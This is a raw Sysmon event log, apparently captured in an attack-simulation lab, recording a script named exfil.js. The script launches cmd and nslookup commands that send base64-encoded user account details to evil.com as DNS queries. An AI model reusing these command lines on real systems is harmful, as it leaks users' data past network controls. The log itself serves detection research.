14:16:40.961{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.961{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.961{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8841-000000005F02}5976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.961{2E1864BB-17A1-629A-783D-000000005F02}55522692C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-8841-000000005F02}5976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.961{2E1864BB-17C8-629A-8841-000000005F02}5976C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsqy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.945{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgwud.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.892{2E1864BB-17C8-629A-8641-000000005F02}20764904C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-8741-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.892{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8741-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.892{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.892{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.892{2E1864BB-17C8-629A-8541-000000005F02}72928020C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-8741-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.892{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.892{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.895{2E1864BB-17C8-629A-8741-000000005F02}300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-8541-000000005F02}7292C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgwud.tmp 2>&1 10341000x8000000000000000203100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.840{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8641-000000005F02}2076C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.840{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8641-000000005F02}2076C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.823{2E1864BB-17C8-629A-8641-000000005F02}20764904C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-8541-000000005F02}7292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000203097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.931{00000000-0000-0000-0000-000000000000}1080evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.845{00000000-0000-0000-0000-000000000000}6888evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.807{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8641-000000005F02}2076C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000203094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.758{00000000-0000-0000-0000-000000000000}6408evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.623{00000000-0000-0000-0000-000000000000}5088evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.492{00000000-0000-0000-0000-000000000000}6140evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.807{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000203090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.372{00000000-0000-0000-0000-000000000000}2932evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.288{00000000-0000-0000-0000-000000000000}7384evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.807{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000203087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.152{00000000-0000-0000-0000-000000000000}7560evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.019{00000000-0000-0000-0000-000000000000}5896evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.856{00000000-0000-0000-0000-000000000000}6196evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.807{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000203083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.746{00000000-0000-0000-0000-000000000000}2800evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.665{00000000-0000-0000-0000-000000000000}5724evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.807{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000203080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.560{00000000-0000-0000-0000-000000000000}2032evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.479{00000000-0000-0000-0000-000000000000}7344evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000203078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.807{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-8541-000000005F02}7292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.807{2E1864BB-17A1-629A-783D-000000005F02}55525000C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-8541-000000005F02}7292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.808{2E1864BB-17C8-629A-8541-000000005F02}7292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgwud.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.791{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbaab.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.760{2E1864BB-17C8-629A-8341-000000005F02}23844364C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-8441-000000005F02}2556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.744{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 